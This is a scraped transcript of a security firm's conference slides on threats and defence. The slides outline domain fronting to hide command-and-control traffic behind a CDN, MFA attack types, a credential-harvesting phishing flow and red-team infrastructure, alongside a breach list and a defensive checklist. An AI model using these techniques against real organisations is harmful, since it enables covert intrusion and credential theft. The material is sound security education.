are you ready for a cyber tsunami?...are you ready for a cyber tsunami? harman singh @digitalamli...
TRANSCRIPT
![Page 1: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/1.jpg)
www.defendza.com @defendzaltd
A Practical Approach to Threats & Detection
Are you ready for a Cyber Tsunami?
Harman Singh@digitalamli
![Page 2: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/2.jpg)
www.defendza.com @defendzaltd
What is the best place to hide a dead body?
Page 2 of Google
Search results
![Page 3: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/3.jpg)
www.defendza.com @defendzaltd
Plan Calculus
First programming language
that used algorithms
1945
US ARPA
First Network to implement
TCP/IP Suite
1967
Personal Computers Invented
Kenbak-1 for 750$, sold 40
units. Micral N used
microprocessor
1970s
Alto Personal Computer
Xerox PARC developed Alto.
Bitmapped screen, and
demonstrated GUI
1973
WWW
Tim Berners-Lee created
World wide web at a swiss
laboratory
1990
Evolution of the field of computer science
reference: www.bestchoiceschools.com
![Page 4: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/4.jpg)
www.defendza.com @defendzaltd
SCADA
DCS
CNC Systems
Systems for monitoring & controlling
ICS
PLCs
RTUs
OT
Operational Technology
![Page 5: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/5.jpg)
www.defendza.com @defendzaltd
IT + OT Factories of future
Industrial Internet
CYBER SECURITY VIEW“Love is a temporary insanity curable by marriage.”
![Page 6: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/6.jpg)
www.defendza.com @defendzaltd
Make of that what you will…
![Page 7: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/7.jpg)
www.defendza.com @defendzaltd
tactics, techniques & procedures
![Page 8: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/8.jpg)
www.defendza.com @defendzaltd
• Basics - Circumvent censorship restrictions
Domain Fronting – Real World
![Page 9: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/9.jpg)
www.defendza.com @defendzaltd
❑ Straightforward process to setup domain front:o Define C2 in CDN distributions o Payload calls back to the CDNo CDN redirects C2 traffic to C2 servero Our payload will call back the ‘good’ CDN host,
that will redirect to C2 server
❑ Cloud providers say it’s ‘disabled’, it works.
Domain Fronting - Red Teaming Use Case
![Page 10: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/10.jpg)
www.defendza.com @defendzaltd
Single Factor
Two Factor
Multi-Factor
Something you know
Something you have
Something you are
Other flaws factors
Multi-Factor Authentication - Concepts
auth
In-Band Auth Out-of-Band Auth
![Page 11: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/11.jpg)
www.defendza.com @defendzaltd
Multi-Factor Authentication - Attacks
Social EngineeringUsing spear-phishing campaigns, for instance spoofed LinkedIn domain-based
phishing01Technology AttacksUnderlying technology in use for MFA factors such as SIM Swapping, SS7
attacks to capture SMS codes02
Endpoint AttacksUsing malicious software to steal the info such as codes, or stealing
cookies after authentication04Compromised 2FA SoftwareMore specialized technique using rogue software installation such as
drivers, smartcard-related software, by which it can manipulate or
replace the legit software.05
Integrated AssetsActive directory /smartcard , email hijacks06
Man-in-the-middle AttacksBy tricking the user into visiting a rogue website setup by an
attacker, and then stealing non-2FA token. 03
![Page 12: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/12.jpg)
www.defendza.com @defendzaltd
Phishing Attack Lifecycle
EMAILPhishing email containing link to
the spoofed page
MAGIC HAPPENSUser selects the file to run,.
LOGINUser is redirected to spoofed login
page to submit creds
C2 ESTABLISHEDConnected established with C2
servers
HARVESTCredentials are captured and sent
to the server.
User redirected to file download
prompt ‘Do you want to run
SSOLogin?’
![Page 13: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/13.jpg)
www.defendza.com @defendzaltd
Red Team Attack Overview
CS-2 [DNS] Internet
Attack Infra (Cloud) Target Organization
TS1 TS2
RSP Phish
C2-1 [CDN]CDN
Command Control Traffic
Phishing Link
Responder
TS1 , TS2 – AttackTeam serversC2-1 C2 using CDNC2-2 C2 using DNSPhish – Phish ServerRSP – Responder
![Page 14: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/14.jpg)
www.defendza.com @defendzaltd
security problems
![Page 15: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/15.jpg)
www.defendza.com @defendzaltd
No frills…
![Page 16: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/16.jpg)
www.defendza.com @defendzaltd
Business Side
➢Compliant but not secure▪ Do the ground work, no shortcuts will work.
➢ Tick Box Exercises▪ Understand business objectives and map to requirements
➢Golf Course Deals▪ Decision making to consider technical product evaluations▪ Examples
![Page 17: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/17.jpg)
www.defendza.com @defendzaltd
Example - Red Teaming isn’t for everyone. STOPwasting your budgets.
Golf course deals - Example
![Page 18: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/18.jpg)
www.defendza.com @defendzaltd
![Page 19: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/19.jpg)
www.defendza.com @defendzaltd
Business Side
➢ Lack of …▪ Stop cribbing, build a business case. If it’s management’s accountability, let
them own it. If it’s yours you must do it right.
Last but not the least, Remember that:
LESS IS MORERobert Browning’s ‘Andrea del Sarto’
![Page 20: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/20.jpg)
www.defendza.com @defendzaltd
Stop selling FUD. Sometimes it sells,
sometimes it doesn’t.
Vendor Side
![Page 21: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/21.jpg)
www.defendza.com @defendzaltd
A lame attempt at Indexing endless breaches….
AAdobe - 38 million worldwideApple - 225,000 users worldwide
BBritish Airways - 380,000 TransactionsButlin’s - 34,000 guest recordsBupa - 547,000 customers worldwide, 43,000 in UKBethesda- Unknown
CCash Converters 2 - Number affected was not revealedCathay Pacific - 9.4 million people
DDixons Carphone 2 - 10 million customers dataDeloitte
![Page 22: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/22.jpg)
www.defendza.com @defendzaltd
EEquifax - 15.2millionEvernote
FFacebook - 50 million worldwideFortnum and Mason - 23,000
GThe Government - 25 million child benefit recordUniversity of Greenwich - exposed the personal data around 20,000 students
HHSBC - undisclosed number of mortgage customersHSBC - Online Banking (USA So far)Heathrow Airport
…. So on
Source : https://community.monzo.com/t/the-hack-list/46880
![Page 23: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/23.jpg)
www.defendza.com @defendzaltd
the practical 10 pointer
![Page 24: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/24.jpg)
www.defendza.com @defendzaltd
Practical 10 Pointer Approach – 1/4
Essential component for a proactive web application
security conscious asset
THREAT MODELLING
Segregation is a must at code, network and privilege
level
SEGREGATION
Important to detect and prevent insecure coding
practices
SECURE CODING
Loads and loads of SME’s are in this bracket –
threat modelling should be integrative and agile
involving collaboration between security,
development, and operations teams
OWASP Thread Modelling is a good start
Deploy secure coding approaches that focus on
detecting unsafe and insecure coding practices
Secure coding should be integrated into the
development process regardless of the device,
or environment used while programming
Network level segregation b/w production and
corporate
Segregation where code is deployed and
staging environments
![Page 25: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/25.jpg)
www.defendza.com @defendzaltd
Practical 10 Pointer Approach – 2/4
Secure hardening configuration , validation using
penetration testing and red teaming style exercises
SECURE INFRASTRUCTURE
Trusted partners of your business must be trusted
using technical controls
SUPPLY CHAIN
Privilege access management restricts access in a
number of scenarios such as stolen credentials, or
inside attackers
ACCESS MANAGEMENT
Penetration Testing for validation purposes. Eg,
AD based protection choices are massive now
Secure Hardening practices across end points,
server segments, networks, perimeter, etc.
Makes it easier before going live or enrolling
devices into production environment.
Privileged accounts should be more restrictive,
practice what you preach for IT teams
Least privilege principle along with defense in
depth approach
Third Party Supply Chain hacks are everywhere
No tick in the box please!
Enforce it via SLA’s.
![Page 26: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/26.jpg)
www.defendza.com @defendzaltd
Practical 10 Pointer Approach – 3/4
Establish anti-malware defences at perimeter (if
there is one) and endpoint level
MALWARE PROTECTION
Having incident management plans along with
periodic testing during testing times
INCIDENT MANAGEMENT
Awareness of cyber risks would help improving the
weakest link in cyber kill chain
SECURITY AWARENESS
Producing relevant policies and establishing
anti-malware protections across the estates
Peripheral device usage restrictions
Go less on shopping, more solutions like
Applocker
Probably the weakest link in the cyber kill
chain?
Maintain continuous awareness and validation
to review your ongoing projects
Ensure ground level support by widening your
approach from senior management buyouts
Establish incident response and disaster
recovery /backup capability
TEST. TEST. TEST!
Provide trainings to the staff and report
criminal incidents to authorities. Don’t pay
ranoms
![Page 27: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/27.jpg)
www.defendza.com @defendzaltd
Practical 10 Pointer Approach – 4/4
Logging relevant events and monitoring for
anomalies to help reduce the reaction time
LOGGING & MONITORING
Logging what you need, not what seems right.
Ensure it’s centralised or on separate
segments/devices than primary assets.
Monitoring is possible with good logging
combined with analysis job, to ensure
anomalies are caught in time. CONTINUOUSLY!
![Page 28: Are you ready for a Cyber Tsunami?...Are you ready for a Cyber Tsunami? Harman Singh @digitalamli @defendzaltd What is the best place to hide a dead body? Page 2 of Google Search results](https://reader035.vdocuments.us/reader035/viewer/2022070802/5f02efa77e708231d406be6a/html5/thumbnails/28.jpg)
www.defendza.com @defendzaltd
The following useful guides are available for free. ✓ Buyer’s guide to security✓ 10 Pointer Risk Management✓ Security Awareness Image Quotes
Drop an email to the below address:
[email protected] Innovation Forum,
51 Frederick Road
Salford M6 6FP
PHONE+ 0203 916 5444
+ 161 743 3495-97
EMAIL/[email protected]
@defendzaltd
WEBwww.defendza.com
(under construction )